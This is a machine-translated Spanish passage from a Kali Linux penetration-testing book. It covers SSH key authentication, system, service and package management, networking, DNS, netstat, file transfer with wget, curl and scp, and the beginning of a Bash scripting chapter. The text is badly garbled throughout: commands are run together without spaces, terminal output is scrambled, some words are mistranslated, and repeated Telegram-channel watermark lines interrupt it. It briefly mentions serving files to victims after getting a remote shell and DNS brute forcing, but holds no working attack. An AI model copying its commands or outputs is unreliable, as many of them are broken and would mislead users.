operativo: KaliLinux2020.1 IP: 10.0.0.246 Primero, generaremos una clave pública y una clave privada en nuestro host cliente (Ubuntu). ¿Por qué? El objetivo es realizar los siguientes pasos: 1. Genere una clave privada ( /home/[nombre de usuario]/.ssh/ id_rsa ) en la máquina cliente porque es la que puede descifrar la clave pública. 2. Genere una clave pública ( /home/[nombre de usuario]/.ssh/ id_rsa.pub ) en la máquina cliente. Necesitamos enviar una copia de la clave pública al servidor. Después de eso, el servidor almacenará la clave pública del cliente en un archivo llamado claves_autorizadas . ¡Comencemos! En nuestro host Ubuntu cliente, genere las claves públicas y privadas (Figura 1.13): $ ssh-keygen-trsa-b4096 Canal de Telegram : @IRFaraExam Machine Translated by Google El comando anterior usaba dos argumentos: ÿTrsa : La t representa el tipo de clave a generar. RSA es la más uno común, pero también tiene otras opciones ( dsa y rsa ). , ed25519 , ed25519ÿsk , ecdsa , ecdsaÿsk , ÿb4096 : La opción b especifica el número de bits en la clave para crear. nuestro caso (clave RSA), el tamaño mínimo es 1024 bits y el valor predeterminado es 3072 pedacitos Tome nota de que mientras realizamos los pasos anteriores, se nos ha pedido que ingresemos una frase de contraseña. Esta contraseña se usará para agregar más seguridad cuando inicie sesión de forma remota a SSH. Figura 1.13 Generación de claves SSH Revisemos la carpeta donde se guardaron estos archivos en el host del cliente máquina( /home/gus/.ssh/ ): gus @ ubuntu: ~ / .ssh $ ls-la total16 drwx------2gusgus4096Oct110:03. drwxr-xr-x15gusgus4096Oct109:57.. -rw-------1gusgus3369Oct110:03id_rsa -rw-r--r--1gusgus736Oct110:03id_rsa.pub Canal de Telegram : @IRFaraExam Machine Translated by Google Ahora estamos listos para enviar una copia del archivo de clave pública id_rsa.pub a Kali máquina host. Puede enviarlo de varias maneras (por ejemplo, por correo electrónico, SFTP, SCP, etc.) Existe un método fácil y seguro con el paquete de cliente SSH que viene con la herramienta SSH: $ ssh-copy-idusername_on_kalihost@kaliIP En el siguiente ejemplo, usaremos el nombre de usuario raíz y la contraseña (también, usted se le pedirá la contraseña de esta cuenta) para copiar el archivo de clave pública: gus@ubuntu:~/.ssh$ssh-copy-idroot@10.0.0.246 No se puede establecer la autenticidad del host '10.0.0.246(10.0.0.246)'. ECDSAla huella dactilar es SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U. ¿Está seguro de que desea continuar conectándose (sí/no/ [huella digital])? sí /usr/bin/ssh-copy-id:INFO:intentando iniciar sesión con la(s) clave(s) nueva(s), para filtrar cualquiera que ya esté instalada /usr/bin/ssh-copy-id:INFO:1clave(s)queda(n)instalada(s), si se le solicita que instale las claves nuevas Clave: Númerodellave(s)añadidas:1 Ahora intente iniciar sesión en la máquina con: "ssh'root@10.0.0.246'" y verifique para asegurarse de que solo se agregaron las claves que deseaba. Ahora, verifiquemos que la clave autorizada realmente se haya agregado en el host Kali máquina: root@kali:~/.ssh#catauthorized_keyssshrsaAAAAB3NzaC1yc2EAAAADAQABAAACAQDNfvP6zEnKn55pY5hN8N34myD1XwwhS9JisvcR0qtXzM2957 gus@ubuntu A continuación, editaré el archivo de configuración SSH ( /etc/ssh/sshd_config ) nuevamente en Kalito permitir solo autenticación de clave pública: PubkeyAuthenticationyes ContraseñaAutenticaciónno PROPINA Canal de Telegram : @IRFaraExam Machine Translated by Google Para asegurarse de que los cambios se propagan bien, es mejor reiniciar el servidor SSH en Kalius con este comando: $serviciosshrestart Es hora de probar la conexión SSH y ver si funciona de forma remota: gus@ubuntu:~/.ssh$sshroot@10.0.0.246 Linuxkali5.5.0-kali1amd64#1SMPDebian5.5.13-2kali1(2020-04-03)x86_64 Los programas incluidos con el sistema Kali GNU/Linux son software libre; los términos de distribución exactos para cada programa se describen en los archivos individuales en /usr/share/ doc/*/copyright. KaliGNU/Linux viene CON ABSOLUTAMENTE NINGUNA GARANTÍA, en la medida permitida por la ley aplicable. Último inicio de sesión: jue oct 112: 04: 152020 de 10.0.0.222 root @ kali: ~ # Gestión del sistema KaliLinux Dado que usará Kali Linux como un arsenal de pruebas de penetración, entonces debe saber cómo manejar su sistema, incluido cómo iniciar un servidor web Apache o verificar su estado. Los ejemplos son interminables. Canal de Telegram : @IRFaraExam Machine Translated by Google Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.14 Comandos de administración del sistema Kali LinuxHostInformación Para mostrar el nombre de host de Kali Linux, simplemente ejecute el comando de nombre de host en su ventana de terminal: $nombre de host root@kali:/#nombre de host kali ¿Qué sucede si desea cambiar el nombre de su host Kali? Luego deberá editar su archivo de configuración /etc/hostname (ingrese el nombre de la computadora deseada y no se olvide de guardar y reiniciar su host). LinuxOSInformación Conocer la información del sistema operativo para un host Linux es crucial para la escalada de privilegios. Así es como desea saber la versión que se utiliza para completar la declaración de privacidad (queremos hablar sobre el capítulo 10). Para mostrar la información del sistema operativo de un sistema operativo Linux (que es Kali Linux en nuestro caso), utilizo el comando uname y, junto con él, muestro el contenido del archivo de configuración / etc/issue : $uname-a $gato/etc/problema root@kali:/#uname-a Linuxkali5.6.0kali2-amd64#1SMPDebian5.6.14-2kali1(2020-06-10)x86_64GNU/Linux root@kali:/#cat/etc/issue KaliGNU/ LinuxRolling\n\l LinuxHardwareInformación De vez en cuando, probablemente usará comandos especiales relacionados con el hardware de su PC o VM. Para obtener la información de la CPU de su servidor Linux, debe abrir /proc/cpuinfo : root@kali:/#cat/proc/cpuinfo Canal de Telegram : @IRFaraExam Machine Translated by Google :0 :GenuineIntel :6 :158 : Intel(R)Core(TM)i7-8700CPU a 3,20 GHz :10 procesadorproveedor_idcpufamiliamodelomodelonombrepaso a paso :0xd6 :3192.001 :12288KB microcódigocpuMHztamaño de caché[…] ParaobtenerlainformaciónRAMdesuhostKali,entoncesnecesitaráabrirla archivo de configuración /proc/meminfo : root@kali:/#cat/proc/meminfo MemTotal:8676820kB 6183876kB MemFree:MemDisponible:7781928kB Búferes: 55444kB En caché: 1739668kB Intercambio en caché: 0kB […] Para mostrar los dispositivos adjuntos (p. ej., unidades de disco, particiones, etc.), debe una elección de dos comandos: fdisk (que muestra más información) o lsblk : $ fdisk-l root@kali:/#fdisk-l Disco/dev/sda:80GiB,85899345920bytes,167772160sectores Modelo de disco:VMwareVirtualS Unidades: sectores de 1512 = 512*bytes Tamaño del sector (lógico/físico): 512 bytes/512 bytes I/Osize (mínimo/óptimo): 512 bytes/512 bytes Tipo de etiqueta de disco:dos Identificador de disco: 0x4a6f3195 Dispositivo Arranque/dev/sda1*/ dev/sda2/dev/sda5 Comienzo EndSectorsSizeIdType 204816357990316357785678G83Linux 16358195016777011141881622G5Extendido 16358195216777011141881602G82Linuxintercambiar/ Solaris $lsblk Canal de Telegram : @IRFaraExam Machine Translated by Google raíz@kali:/#lsblk NOMBRE MAYO: MINRMSIZEROTYPEMOUNTPOINT 080G0disco8:0 078G0parte/ 01K0parte 8:18:28:5 02G0parte[CAMBIAR] sdaÿsda1ÿsda2ÿsda5 sr0 11:0 11024M0rom Para mostrar la lista de dispositivos USB (p. ej., mouse, teclado, memoria USB, etc.), luego tiene que ejecutar el comando lsusb : $lsusb root@kali:/#lsusb Bus001Dispositivo001:ID1d6b:0002LinuxFoundation2.0roothub Bus002Device004:ID0e0f:0008VMware,Inc.VMwareVirtualUSB Ratón Bus002Device003:ID0e0f:0002VMware, Inc. VirtualUSBHub Bus002Device002:ID0e0f:0003VMware, Inc. Ratón virtual Bus002Dispositivo001:ID1d6b:0001LinuxFoundation1.1roothub Para mostrar todos los directorios montados en el sistema de archivos, deberá ejecutar el comando de montaje : $montar root@kali:/#montar sysfson/systypesysfs(rw,nosuid,nodev,noexec,relatime) procon/proctypeproc(rw,nosuid,nodev,noexec,relatime) udevon/ devtypedevtmpfs(rw,nosuid,noexec,relatime,size=4308020k,nr_inodes=1077005,mode=755) […] Gestión de los servicios de ejecución Los servicios son servidores que pueden ejecutarse en su Kali Linuxbox, como SSH, web, FTP, etc Una de las tareas comunes en las pruebas de penetración es un servidor web en su Kaliso, puede transferir archivos a las máquinas de sus víctimas (entraré en más detalles más adelante en este libro) después de obtener un shell remoto. Entonces, por ejemplo, para iniciar la web servidor en su Kali Linux (para su información, esa no es la única forma de iniciar un servicio, pero es mi favorito porque es fácil de memorizar): Canal de Telegram : @IRFaraExam Machine Translated by Google root@kali:/#serviceapache2start Estos son los comandos restantes que deberá conocer acerca de la administración de servicios: Para obtener el estado de un servicio (iniciado, detenido): $servicio[nombre del servicio]estado $systemctlstatus[nombre del servicio] Para iniciar un servicio: $servicio[nombre del servicio]inicio $systemctlstart[nombre del servicio] Servidor de servicio Tostopa: $servicio[nombre del servicio]stop $systemctlstop[nombre del servicio] Para reiniciar un servicio: $servicio[nombre del servicio]reiniciar $systemctlrestart[nombre del servicio] Para permitir que un servicio comience a arrancar automáticamente: $systemctlenable[servicename] Para deshabilitar un servicio para que no se inicie automáticamente en el arranque: $systemctldisable[servicename] Administración de paquetes Lo primero que debe saber antes de actualizar su sistema Kali Linux es que el archivo de configuración para el repositorio de Kali se encuentra en /etc/apt/sources.list : root@kali:/#cat/etc/apt/sources.list # #debcdrom:[KaliGNU/Linux2020.2rc1_Kali-last-snapshot_Officialamd64DVDBinary-1withfirmware20200505-14:58]/kali rollingcontribmainnon-free Canal de Telegram : @IRFaraExam Machine Translated by Google #debcdrom:[KaliGNU/Linux2020.2rc1_Kali-last-snapshot_Officialamd64DVDBinary-1withfirmware20200505-14:58]/kali rollingcontribmainnon-free debhttp: //http.kali.org/kalikali-rollingmainnon-freecontrib #deb-srchttp: //http.kali.org/kalikalirollingmainnon-freecontrib Para actualizar su sistema Kali Linux (como Windows Update), ejecute primero el comando de actualización y luego el comando de actualización . Tome nota, estos dos comandos utilizarán el archivo de configuración anterior para descargar e instalar los archivos necesarios: $aptupdate $aptupgrade-y Usamos la opción ÿy en el comando de actualización para ignorar las solicitudes donde se solicita la entrada de datos. En otras palabras, solo estamos diciendo "sí" por adelantado. ¿ Cuál es la diferencia entre los comandos de actualización y actualización ? Esa es una pregunta confusa para principiantes, y estoy aquí para ayudarlo a comenzar a usar estos dos comandos con confianza. En resumen, el comando de actualización solo actualiza la lista de paquetes con las versiones más recientes, pero no instala ni actualiza el paquete . Ahora, para usar estos comandos juntos, tendrá que usar el && intermedio, que eventualmente ejecutará el primer comando, y cuando termine, ejecutará el segundo: $aptupdate&&aptupgrade-y Para actualizar completamente de una versión a otra, ejecute el comando de actualización completa junto con el comando de actualización . $aptupdate&&aptfull-upgrade-y Ahora, para obtener una lista de todos los paquetes de software instalados en KaliLinux, deberá usar el comando dpkg : $dpkg-l ¿Qué pasa con la instalación de un nuevo software (paquete) en Kali? Hay dos formas comunes que utilizo la mayor parte del tiempo. La primera es el comando aptinstall y Canal de Telegram : @IRFaraExam Machine Translated by Google el segundo es dpkg (utilizo este último solo cuando descargo un archivo que termina con la extensión .deb ). $aptinstall[nombre del paquete]-y $dpkgi[nombre del archivo.deb] En algunos paquetes de software, requerirán que use la forma de instalación configure / make , si ese es el caso, luego use los siguientes comandos (debe estar dentro del directorio de la aplicación): $./configure&&make&&makeinstall Si desea eliminar una aplicación existente de su sistema Kali, use el comando aptremove : $aptremove[nombre del paquete] ¿Cómo encontramos un nombre de paquete? Digamos que desea instalar algo que aún no está instalado en Kali. Luego puede buscar los paquetes del repositorio usando el siguiente comando: $apt-cachesearchpalabra clave Finalmente, si desea instalar un paquete y no está seguro de si el nombre existe en el repositorio, entonces puede usar el comando aptÿcacheshow : $apt-cacheshow[nombre del software] root@kali:/#apt-cacheshowfilezilla Paquete:filezilla Versión:3.49.1-1 Tamaño instalado:6997 Mantenedor:AdrienCunin<adri2000@ubuntu.com> Arquitectura:amd64 […] Gestión de proceso Una de mis herramientas de ventana de terminal favoritas para enumerar todos los procesos en ejecución en Kalii se llama htop . De manera predeterminada, no está instalada en Kali, así que para instalarla, usamos el comando aptinstall : root@kali:/#aptinstallhtop-y Leyendo listas de paquetes... Listo Canal de Telegram : @IRFaraExam Machine Translated by Google BuildingdependencytreeReadingstateinformation…Done Una vez que esté instalado, puede ejecutar el comando htop : $htop Como puede ver en la Figura 1.15, estamos ejecutando Nmapa en otra ventana de terminal y tiene un ID de proceso (PID) igual a 1338. Figura 1.15 HTOP Otra forma de obtener la lista de procesos actualmente en ejecución es mediante el comando ps : $ps-Au -A: Para seleccionar todos los procesos (si desea enumerar solo los procesos que pertenecen al usuario actual, use la opción -x en su lugar) -u: muestra más información (por ejemplo, CPU, MEM, etc.) que la salida predeterminada Para eliminar un proceso, primero deberá identificar su PID; luego, puede usar el comando de eliminación para realizar el trabajo: $matar[PID] Si el sistema no le permite matarlo, entonces debe forzarlo a cerrar usando el interruptor ÿ9 : $matar-9[PID] Redes en KaliLinux Canal de Telegram : @IRFaraExam Machine Translated by Google En esta sección, tendrá la oportunidad de comprender los conceptos básicos de las redes en Kali Linux. Más adelante en el libro volveremos a temas más avanzados relacionados con las redes, así que asegúrese de comprender y captar el contenido de esta sección. Figura 1.16 Comandos de red de Kali Interfaz de red Debe ser experto en redes para sobrevivir en la carrera de pruebas de penetración. Es uno de los pilares del trabajo si va a ejecutar pruebas de penetración de infraestructura de red. Los hosts de PC tienen direcciones IP internas para conectarse con la red, y tienen una dirección IP pública para comunicarse con el mundo exterior. Esta última es la misión de su enrutador doméstico, y usted no lo administra localmente en su host local. Por otro lado, debe mantener las direcciones IP de la red interna, que son estáticas (usted las define) o asignadas automáticamente por un servidor DHCP (que generalmente es su enrutador doméstico). Rangos de direcciones privadas IPv4 Las direcciones IP internas (también conocidas como direcciones IP privadas) para IPv4 tienen varios rangos: clases A, B y C. Clase A: 10.0.0.0 a 10.255.255.255 o 10.0.0.0 / 8 (hasta 16 777 214 hosts) Clase B: 172.16.0.0 a 172.31.255.255 o 172.16.0.0/12 (hasta 1 048 574 hosts) Clase C: 192.168.0.0 a 192.168.255.255 o 192.168.0.0/24 (hasta 254 hosts) El rango más grande es la clase A para corporaciones, pero puede usarlo en casa. (Nadie le impedirá hacer eso, ¿y adivine qué? Lo uso yo mismo en mi red doméstica). El segundo, clase B, es para pequeñas/medianas/grandes empresas (según la cantidad de hosts). Canal de Telegram : @IRFaraExam Machine Translated by Google Echemos un vistazo rápido a la dirección IP de Kalihost. nuestra interfaz de red, ejecute el popular comando ifconfig (tenga en cuenta que últimamente ha habido un cambio para usar el comando ipaddr en lugar de ifconfig ). De acuerdo con la Figura 1.17, tenemos dos interfaces de red. La primera en el arriba, red , es el adaptador Ethernet que conecta mi host Kali con el eth0 . Si tuviéramos un segundo adaptador Ethernet, sería eth1 . (Tenga en cuenta que , wlan1 , si está utilizando un adaptador inalámbrico en su host, verá wlan0 , etc.) Figura 1.17 Interfaces de KaliNetwork . Hay dos hechos importantes que debe comprender acerca de nuestro adaptador Ethernet eth0 Primero, inet10.0.0.246 representa la dirección IP del host Kali que se asignó automáticamente por el servidor DHCP. La segunda parte es la máscara de red, lo que significa que estamos usando una subred/24; en otras palabras, solo necesitamos 254 hosts para estar asignado en este rango de IP. La segunda interfaz es para , que representa un bucle invertido local; nunca tocar esto ya que la infraestructura de red necesitará editar para operar correctamente. Hay otras dos interfaces comunes con las que se encontrará; la primera es la interfaz inalámbrica si está conectado de forma inalámbrica en lugar del cable. la segunda es la interfaz VPN, si está conectado a un servidor VPN remoto. Direccionamiento IP estático Si desea asignar una dirección IP fija a su host Kali, deberá editar Canal de Telegram : @IRFaraExam Machine Translated by Google el archivo de configuración /etc/network/interfaces . En las siguientes novedades configuration, que se muestra en la Figura 1.18, agrega estos tres componentes principales: Dirección IP estática (va a ser 10.0.0.20 en mi caso; en su caso, tiene que coincidir con su rango de direcciones IP privadas) Máscara de subred o CIDR (/ 24 significa 255.255.255.0) Dirección IP del enrutador/puerta de enlace (mi dirección IP del enrutador es 10.0.0.1; la suya podría ser diferente) Figura 1.18 Configuraciones IP estáticas Después de guardar los cambios, asegúrese de reiniciar su máquina Kali para que esta nueva dirección IP fija esté en funcionamiento. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.19 Prueba de conexión a Internet Tome nota de que estamos utilizando la red 10.0.0.0 como nuestra VLAN principal (red virtual). De hecho, tenemos varias VLAN en nuestra red doméstica. Por ejemplo, tenemos una VLAN para dispositivos IoT, pero ¿por qué? Otro ejemplo es la VLAN de invitados. Esta red es para las personas que se conectan al punto de acceso inalámbrico de invitados y se les asignará en el rango de direcciones 10.0.20.0. Las empresas implementan el mismo concepto. Idealmente, tienen un entorno de desarrollo que es diferente a la red VLAN del entorno de producción. DNS El Sistema de nombres de dominio (DNS) traduce los nombres de dominio en direcciones IP. Por ejemplo, en lugar de escribir https://172.217.13.132 , simplemente escriba https:// google.com. La pregunta es, ¿cómo llegué a la dirección IP? Use el comando host en su ventana de terminal : Canal de Telegram : @IRFaraExam Machine Translated by Google $host[nombre de dominio] root@kali:/#hostgoogle.com google.comhasaddress172.217.13.174 google.comhasIPv6address2607:f8b0:4020:806::200e google.commailishandledby40alt3.aspmx.l.google.com. google.commailishandledby30alt2.aspmx.l.google.com. google.commailishandledby10aspmx.l.google.com. google.commailishandledby50alt4.aspmx.l.google.com. google.commailishandledby20alt1.aspmx.l.google.com. El DNS se divide en dos categorías: público y privado (como las direcciones IP). La dirección DNS de Google es pública para que cualquier persona conectada a Internet pueda acceder al sitio web de Google. Por otro lado, podemos tener un DNS privado para nuestra intranet local. Esto se puede configurar usando un servidor DNS (por ejemplo, Microsoft Windows Server) o su enrutador tiene un servidor DNS integrado. . ksec.local corresponde a su dirección IP. Por ejemplo, el nombre de dominio de mi servidor de archivos es ds- server.ksec.local (porque el nombre de host del servidor es ds-server ), y el enrutador/servidor DNS administrará todos los registros DNS (se asigna un registro entre direcciones IPv4 y nombres de dominio): root@kali:~#hostds-server.ksec.local dsserver.ksec.localhasaddress10.0.0.177 Si especifica un registro DNS existente, recibirá un mensaje de error (esto es útil para aplicar fuerza bruta a los registros DNS): root@kali:~#hosthello.ksec.local Hosthello.ksec.localnotfound:3(NXDOMAIN) Tenga en cuenta que puede obtener sus propios registros DNS estáticos dentro de su Kalihost. El archivo está ubicado en /etc/hosts , y aquí puede redirigir cualquier nombre de dominio a cualquier dirección IP activa. (Esto demuestra que el envenenamiento de DNS funciona; el pirata informático manipulará los registros para apuntar a la dirección IP de su servidor). root@kali:~#cat/etc/hosts localhost 127.0.0.1127.0.1.1kali #LassiguienteslíneassondeseablesparahostsconcapacidadIPv6localhostip6::1 localhostip6-loopback ff02::1ip6-todos los nodos Canal de Telegram : @IRFaraExam Machine Translated by Google ff02::2ip6-todos los enrutadores Aprenderá más sobre este tema más adelante en este libro, y aprenderá cómo La fuerza bruta DNS y las transferencias de zona funcionan. Conexiones establecidas Para mostrar las conexiones de red activas en su host Kali, debe usar el herramienta de comando netstat para hacer el trabajo. fase posterior a la explotación para comprobar cómo el host Linux se comunica con su la red. En nuestro host Kali, hemos iniciado el SSH (puerto 22) y la web (puerto 80) servicios; la herramienta netstat nos permitirá verlos escuchando conexiones: root@kali:~#netstat-antu Conexiones a Internet activas (servidores y establecidas) ProtoRecv-QSend-QLocalAddressForeignAddressState0.0.0.0: * tcpLISTENtcp6 ::: * LISTENtcp6 ::: * LISTENudp10.0.0.1: 67 0000 00.0.0.0:220:::800:::22010.0.0.185:68 ESTABLECIDO Es fundamental entender lo que significa cada opción: ÿa/ÿÿall :Muestratodaslastomas.Tengaencuentaqueestaopciónesmuy detallado; por lo tanto, necesitamos combinarlo con las siguientes opciones (para filtrar el producción). ÿn/ÿÿ numeric :No resolver nombres. En el comando anterior, vio que la dirección IP es seguida por el número de puerto. Si no utilizo el ÿn opción, entonces la herramienta intentará averiguar el nombre del servicio (por ejemplo, para 80, será HTTP en su lugar). ÿt/ÿÿtcp :Mostrar conexiones TCP. ÿu/ÿÿudp :Mostrar conexiones UDP. Transferencias de archivos Hay muchas maneras de transferir archivos en Kali Linux. Primero, para descargar archivos desde Internet/intranet, tiene dos herramientas en su arsenal: wget y curl el siguiente ejemplo, . En usamos ambas herramientas para descargar un archivo de texto de contraseña Canal de Telegram : @IRFaraExam Machine Translated by Google deunodemisservidoresweblocales: $wget[URL] root@kali:~#wgethttp://ubuntu.ksec.local/passwords.txt --2020-10-0113:32:02-http://ubuntu.ksec.local/passwords.txt Resolviendo ubuntu.ksec.local(ubuntu.ksec.local)… 10.0.0.186 Conectando aubuntu.ksec.local(ubuntu.ksec.local)|10.0.0.186|:80…conectado. Solicitud HTTP enviada, esperando respuesta… 200OK Longitud: 0 [texto/sin formato] Guardando en: 'contraseñas.txt.1' contraseñas.txt.1[<=>]0--.-KB/sin0s 2020-10-0113:32:02(0.00B/s)-'contraseñas.txt.1'guardado[0/0] $curl-O[URL] root@kali:~#curl-Ohttp://ubuntu. ksec.local/passwords.txt %Total%Received%XferdAverageSpeedTimeTimeTimeCurrent DloadSubirTotalGastadoIzquierdaVelocidad 100321003200160000--:--:----:--:----:--:--16000 PROPINA Si desea descargar archivos desde GitHub, puede usar el comando git : $gitclone[gitprojectURL] Otra forma de transferir archivos de forma segura utilizando el protocolo SSH es la herramienta de comando scp . Es importante comprender que necesitará el servicio SSH para iniciarse correctamente para que este proceso funcione correctamente. Primero, iniciaremos el servidor SSH en un host remoto de Ubuntu Linux, y aquí es donde va a descargar mis archivos. (De forma predeterminada, el servidor SSH no está instalado en Ubuntu. Para hacer el trabajo, ejecute el comando $sudoaptinstall abre el servidor sh ) . gus@ubuntu:~$ls Vídeos EscritorioDescargascontraseñas.txtPúblicoDocumentosMúsicaImágenesPlantillas Canal de Telegram : @IRFaraExam Machine Translated by Google Para terminar el trabajo de descargar el archivo, use el comando scp con el patrón siguiente (el punto al final significa que estamos copiando el archivo a nuestro directorio actual en Kali): $scp[nombre-de-usuario-remoto@ip-remota:/ruta-remota][rutalocaldestino] root@kali:~#scpgus@ubuntu.ksec.local:/home/gus/passwords.txt. contraseña de gus@ubuntu.ksec.local:contraseñas.txt 100%1716.7KB/s00:00 A continuación, intentaremos insertar un archivo llamado test.txt desde mi KalitotheremoteSSH servidor (copiaremos el archivo en el directorio de inicio del usuario en Ubuntu) usando el comando scp de nuevo: $scp[filelocalpath][remote-username@remote-ip:/remote-path] root@kali:~#scp/root/test.txtgus@ubuntu.ksec.local:/home/gus contraseña de gus@ubuntu.ksec.local:test.txt 50.4KB/s00:00100% Más adelante en este libro, verá aún más formas de transferir archivos como Samba, FTP, etc. Por el momento, acaba de aprender las formas más comunes en las que necesita ser consciente de. Resumen Con tantos comandos robados para aprender en este capítulo, es abrumador, ¿verdad? El secreto de dominar el uso de las ventanas terminales es a través de la práctica. tomar un tiempo para familiarizarse con la ventana de la terminal, pero una vez que está dentro, usted se enamorará de ella. Su papel se centra en las pruebas de penetración y el objetivo de este capítulo es facilitarle el manejo del sistema KaliLinux. Este capítulo presenta las herramientas y los comandos necesarios que encontrará durante una compromiso. Al final, usted no es un administrador del sistema Linux, pero está en ciberseguridad, tendrá que pensar fuera de la caja. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPITULO 2 BashScripting En el capítulo anterior, aprendió muchos comandos en Linux. Ahora, llevemos sus habilidades al siguiente nivel en las herramientas de línea de comandos. ¿Por qué Bashscripting? La universalidad de Bash nos brinda, a los probadores de penetración, la flexibilidad de ejecutar comandos de terminal potentes sin la necesidad de instalar un compilador o un entorno de desarrollo integrado (IDE). ¿Cuándo debe usar Bashscripts? ¡Esa es una pregunta importante que debe abordar antes de comenzar este capítulo! Basis no está diseñado para desarrollar herramientas sofisticadas. Este capítulo no sólo le enseñará el lenguaje de secuencias de comandos Bash, sino que irá más allá para mostrarle también la ideología de la programación. Si es nuevo en la programación, este es un buen punto de partida para comprender cómo funcionan los lenguajes de programación (comparten muchas similitudes). Esto es lo que aprenderá en este capítulo: Imprimiendo en la pantalla usando Bash Usandovariables Uso de parámetros de secuencia de comandos Entrada de usuario de acción Creación de funciones Uso de sentencias if condicionales Uso de bucles while y for BasicBashScripting Canal de Telegram : @IRFaraExam Machine Translated by Google La figura 2.1 resume todos los comandos, por lo que puede usar una referencia para comprender todo el contenido de este capítulo. En resumen, el scripting básico de Bash se divide en las siguientes categorías: Variables Funciones Entrada del usuario Salida de secuencia de comandos Parámetros Impresión en la pantalla en Bash Hay dos formas comunes de escribir en la salida de la línea de comando del terminal usando Bashscripting . El primer método simple es usar el comando echo que vimos en el capítulo anterior (incluimos el valor de texto entre comillas simples o dobles): $echo'mensaje para imprimir.' El segundo método es el comando printf ; este comando es más flexible que el comando echo porque le permite formatear la cadena que desea imprimir: $printf'mensajeparaimprimir' La fórmula anterior está demasiado simplificada; de hecho, printf también le permite formatear cadenas (no solo para imprimir; es más que eso). Veamos un ejemplo: si queremos mostrar el número de hosts activos en una red, podemos usar el siguiente patrón: root@kali:~#printf"%s%d\n""Número de servidores activos:"15 Número de hosts en vivo: 15 Canal de Telegram : @IRFaraExam Machine Translated by Google Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 2.1 BashScripting Dividamosloscomandosparaquepuedacomprenderloqueestá pasando: %s :Significa que estamos insertando una cadena (texto) en esta posición %d : Significa que estamos leyendo un (número) decimal en esta posición \n :Significa que queremos ir a una nueva línea cuando termine la impresión. Además, tome nota de que estamos usando comillas dobles en lugar de comillas simples. Las comillas dobles nos permitirán ser más flexibles con la manipulación de cadenas que las comillas simples. Para formatear una cadena con el comando printf , puede usar los siguientes patrones: %s :Cadena(textos) %d :Decimal(números) %f : coma flotante (incluidos los números con signo) %x : hexadecimal \n :Nueva línea \r :Retorno del carro \t :Horizontaltab Variables ¿Qué es una variable y por qué todos los lenguajes de programación la usan de todos modos? Considere la variable como un área de almacenamiento donde puede guardar cosas como cadenas y números. El objetivo es usarlos una y otra vez en su programa, y este concepto se aplica a cualquier lenguaje de programación (no solo a Bashscripting). Para declarar una variable, le asigna un nombre y un valor (el valor es una cadena de forma predeterminada). El nombre de la variable solo puede contener un carácter alfabético o un guión bajo (otros lenguajes de programación usan una convención de nomenclatura diferente). Por ejemplo, si desea almacenar la dirección IP del enrutador en una variable, primero creará un archivo var.sh (los archivos Bashscript terminarán en .sh ), y dentro del archivo, ingresará lo siguiente: Canal de Telegram : @IRFaraExam Machine Translated by Google #!/bin/bash #Programa simple con una variable ROUTERIP="10.0.0.1" printf"LadirecciónIPdelrouter:$ROUTERIP\n" Expliquemos su primer archivo Bashscript: #!/bin/bash se llama Bashshebang ; necesitamos incluirlo en la parte superior para decirle a KaliLinux qué intérprete usar para analizar el archivo de script (usaremos el mismo concepto en el Capítulo 18 , "Automatización de Pentest con Python", con el lenguaje de programación Python). El # se usa en la segunda línea para indicar que es un comentario (un comentario es una directiva que el creador dejará dentro del código fuente/script para una referencia posterior). El nombre de la variable se llama ROUTERIP , y su valor es 10.0.0.1. Finalmente, estamos imprimiendo el valor en la pantalla de salida usando la función printf . Para ejecutarlo, asegúrese de otorgarle los permisos correctos primero (consulte el siguiente resultado para ver qué sucede si no lo hace). Dado que estamos dentro del mismo directorio ( /root ), usaremos ./var.sh para ejecutarlo: root @ kali: ~ #. / var.sh bash: ./ var.sh: Permiso denegado root @ kali: ~ # chmod + xvar.sh root @ kali: ~ #. / var.sh TherouterIPaddress: 10.0.0.1 ¡Felicitaciones, acaba de crear su primer script de Bash! Digamos que queremos que este script se ejecute automáticamente sin especificar su ruta en ninguna parte del sistema . Todo eso, debemos agregarlo a la variable $ PATH. En nuestro caso, agregaremos / optaremos por las variables $ PATH para que podamos guardar nuestros scripts personalizados en este directorio . Primero, abra el archivo .bashrc usando cualquier editor de texto. Una vez que el archivo esté cargado, desplácese hasta la parte inferior y agregue la línea resaltada en la Figura 2.2 . Figura 2.2 ExportConfig Canal de Telegram : @IRFaraExam Machine Translated by Google Los cambios agregarán /opt a la variable $PATH . En esta etapa, guarde el archivo y cierre todas las sesiones de la terminal. Vuelva a abrir la ventana de la terminal y copie el archivo de secuencia de comandos en la carpeta / opt . root @ kali: ~ # cpvar.sh / opt / root kali: # cd / opt root @ kali: / opt # ls-la | grep "var.sh" -rwxr-xr-x1rootrootroot @ kali: / opt#var.sh TherouterIPAddress: 10.0.0.1 110Sep2811:24var.sh ComandosVariable A veces, es posible que desee ejecutar comandos y guardar su salida en una variable. La mayoría de las veces, el objetivo detrás de esto es manipular el contenido de la salida del comando. Aquí hay un comando simple que ejecuta el comando ls y filtra los nombres de archivo que contienen la palabra simple usando el comando grep . #!/bin/bash LS_CMD=$(ls|grep'simple') printf"$LS_CMD\n" Estos son los resultados de la ejecución del script: root@kali:/opt#simplels.sh simpleadd.sh simplels.sh Parámetros de secuencia de comandos A veces, necesitará proporcionar parámetros a su script Bash. Tendrá que separar cada parámetro con un espacio, y luego podrá manipular esos parámetros dentro del script Bash. Vamos a crear una calculadora simple ( simpleadd.sh ) que suma dos números: #!/bin/bash #Calculadora simple que suma 2 números Canal de Telegram : @IRFaraExam Machine Translated by Google # Almacenarelprimerparámetroinnum1variable NÚM1=$1 # Almacenarelsegundoparámetroinnum2variable NÚM2=$2 #Almacenarlosresultadosadicionalesenlavariabletotal TOTAL=$(($NUM1+$NUM2)) echo'#######################' printf"%s%d\n""Thetotalis="$TOTAL echo'###### ##################' Puede ver en la secuencia de comandos anterior que accedimos al primer parámetro usando la sintaxis de $1 y al segundo parámetro usando $2 (puede agregar tantos parámetros como desee). Agreguemos dos números usando nuestro nuevo archivo de secuencia de comandos (tome nota de que estoy almacenando mis secuencias de comandos en la carpeta opt a partir de ahora): root@kali:/opt#simpleadd.sh52 ####################### El total es=7 ############# ########### Existe una limitación en el script anterior; solo puede agregar dos números. ¿Qué sucede si desea tener la flexibilidad para agregar de dos a cinco números? En este caso, podemos usar la funcionalidad de parámetro predeterminada. #!/bin/bash 